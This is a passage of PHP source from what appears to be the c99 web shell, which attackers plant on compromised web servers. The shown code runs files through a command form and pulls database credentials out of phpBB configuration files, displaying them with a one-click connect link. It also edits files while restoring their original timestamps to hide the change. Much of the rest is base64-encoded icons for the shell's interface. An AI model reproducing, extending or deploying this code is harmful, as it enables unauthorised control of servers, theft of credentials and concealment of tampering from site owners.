2750    if ($white) {c99shexit();}
2751   }
2752   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2753   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2754   elseif ($ft == "phpsess") {
2755    echo "<pre>";
2756    $v = explode("|",$r);
2757    echo $v[0]."<br>";
2758    var_dump(unserialize($v[1]));
2759    echo "</pre>";
2760   }
2761   elseif ($ft == "exe") {
2762    $ext = explode(".",$f);
2763    $c = count($ext)-1;
2764    $ext = $ext[$c];
2765    $ext = strtolower($ext);
2766    $rft = "";
2767    foreach($exeftypes as $k=>$v)
2768    {
2769     if (in_array($ext,$v)) {$rft = $k; break;}
2770    }
2771    $cmd = str_replace("%f%",$f,$rft);
2772    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2773   }
2774   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2775   elseif ($ft == "code") {
2776     if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
2777       $arr = explode("\n",$r);
2778       if (count($arr == 18)) {
2779         include($d.$f);
2780         echo "<b>phpBB configuration is detected in this file!<br>";
2781         if ($dbms == "mysql4") {$dbms = "mysql";}
2782         if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2783         else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$sh_name.". Please, report us for fix.";}
2784         echo "Parameters for manual connect:<br>";
2785         $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2786         foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2787         echo "</b><hr size=\"1\" noshade>";
2788       }
2789     }
2790     echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
2791     if (!empty($white)) {@ob_clean();}
2792     highlight_file($d.$f);
2793     if (!empty($white)) {c99shexit();}
2794     echo "</div>";
2795   }
2796   elseif ($ft == "download") {
2797     @ob_clean();
2798     header("Content-type: application/octet-stream");
2799     header("Content-length: ".filesize($d.$f));
2800     header("Content-disposition: attachment; filename=\"".$f."\";");
2801     echo $r;
2802     exit;
2803   }
2804   elseif ($ft == "notepad") {
2805     @ob_clean();
2806     header("Content-type: text/plain");
2807     header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2808     echo($r);
2809     exit;
2810   }
2811   elseif ($ft == "img") {
2812     $inf = getimagesize($d.$f);
2813     if (!$white) {
2814       if (empty($imgsize)) {$imgsize = 20;}
2815       $width = $inf[0]/100*$imgsize;
2816       $height = $inf[1]/100*$imgsize;
2817       echo "<center><b>Size:</b>&nbsp;";
2818       $sizes = array("100","50","20");
2819       foreach ($sizes as $v) {
2820         echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2821         if ($imgsize != $v ) {echo $v;}
2822         else {echo "<u>".$v."</u>";}
2823         echo "</a>&nbsp;&nbsp;&nbsp;";
2824       }
2825       echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2826     }
2827     else {
2828       @ob_clean();
2829       $ext = explode($f,".");
2830       $ext = $ext[count($ext)-1];
2831       header("Content-type: ".$inf["mime"]);
2832       readfile($d.$f);
2833       exit;
2834     }
2835   }
2836   elseif ($ft == "edit") {
2837    if (!empty($submit))
2838    {
2839     if ($filestealth) {$stat = stat($d.$f);}
2840     $fp = fopen($d.$f,"w");
2841     if (!$fp) {echo "<b>Can't write to file!</b>";}
2842     else
2843     {
2844      echo "<b>Saved!</b>";
2845      fwrite($fp,$edit_text);
2846      fclose($fp);
2847      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2848      $r = $edit_text;
2849     }
2850    }
2851    $rows = count(explode("\r\n",$r));
2852    if ($rows < 10) {$rows = 10;}
2853    if ($rows > 30) {$rows = 30;}
2854    echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2855   }
2856   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2857   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
2858 }
2859 echo "</div>\n";
2860 }
2861 }
2862 else {
2863 @ob_clean();
2864 $images = array(
2865 "arrow_ltr"=>
2866 "R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQSIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2867 "back"=>
2868 "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2869 "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2870 "Wg0JADs=",
2871 "buffer"=>
2872 "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2873 "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2874 "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2875 "change"=>
2876 "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2877 "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2878 "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2879 "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2880 "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2881 "zMshADs=",
2882 "delete"=>
2883 "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2884 "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2885 "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2886 "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2887 "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2888 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2889 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
2890 "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
2891 "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
2892 "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
2893 "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
2894 "download"=>
2895 "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
2896 "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
2897 "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
2898 "forward"=>
2899 "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2900 "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
2901 "WqsJADs=",
2902 "home"=>
2903 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
2904 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
2905 "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
2906 "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
2907 "mode"=>
2908 "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
2909 "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
2910 "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
2911 "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
2912 "search"=>
2913 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
2914 "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
2915 "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
2916 "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
2917 "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
2918 "setup"=>
2919 "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
2920 "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2921 "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
2922 "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
2923 "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
2924 "small_dir"=>
2925 "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
2926 "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
2927 "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
2928 "small_unk"=>
2929 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
2930 "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
2931 "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
2932 "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
2933 "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
2934 "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
2935 "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
2936 "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
2937 "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2938 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2939 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2940 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2941 
2942 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2943 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2944 "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
2945 "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
2946 "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
2947 "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
2948 "yAsokBkQADs=",
2949 "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
2950 "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
2951 "sort_asc"=>
2952 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
2953 "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
2954 "sort_desc"=>
2955 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
2956 "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
2957 "sql_button_drop"=>
2958 "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2959 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2960 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2961 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2962 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2963 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2964 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2965 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2966 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2967 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2968 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2969 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2970 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2971 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
2972 "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
2973 "AQEAOw==",
2974 "sql_button_empty"=>
2975 "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2976 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2977 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2978 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2979 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2980 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2981 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2982 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2983 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2984 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2985 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2986 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2987 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2988 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
2989 "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
2990 "sql_button_insert"=>
2991 "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2992 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2993 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2994 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2995 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2996 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2997 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2998 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2999 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
3000 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
3001 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
3002 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
3003 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
3004 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
3005 "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
3006 "up"=>
3007 "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
3008 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
3009 "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
3010 "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
3011 "write"=>
3012 "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
3013 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
3014 "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
3015 "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
3016 "ext_asp"=>
3017 "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
3018 "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
3019 "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
3020 "ext_mp3"=>
3021 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
3022 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
3023 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
3024 "ext_avi"=>
3025 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM".
3026 "WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4".
3027 "PYXCyg+V2i44XeRmSfYqsGhAAgA7",
3028 "ext_cgi"=>
3029 "R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9".
3030 "DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6".
3031 "LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S".
3032 "Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ".
3033 "Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3034 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3035 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3036 "AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM".
3037 "BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD".
3038 "AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi".
3039 "RYtMAgEAOw==",
3040 "ext_cmd"=>
3041 "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
3042 "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
3043 "dmrYAMn1onq/YKpjvEgAADs=",
3044 "ext_cpp"=>
3045 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
3046 "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
3047 "Eq7YrLDE7a4SADs=",
3048 "ext_ini"=>
3049 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
3050 "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
3051 "SnEjgPVarHEHgrB43JvszsQEADs=",
3052 "ext_diz"=>
3053 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs".
3054 "/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv".
3055 "/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3".
3056 "/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr".
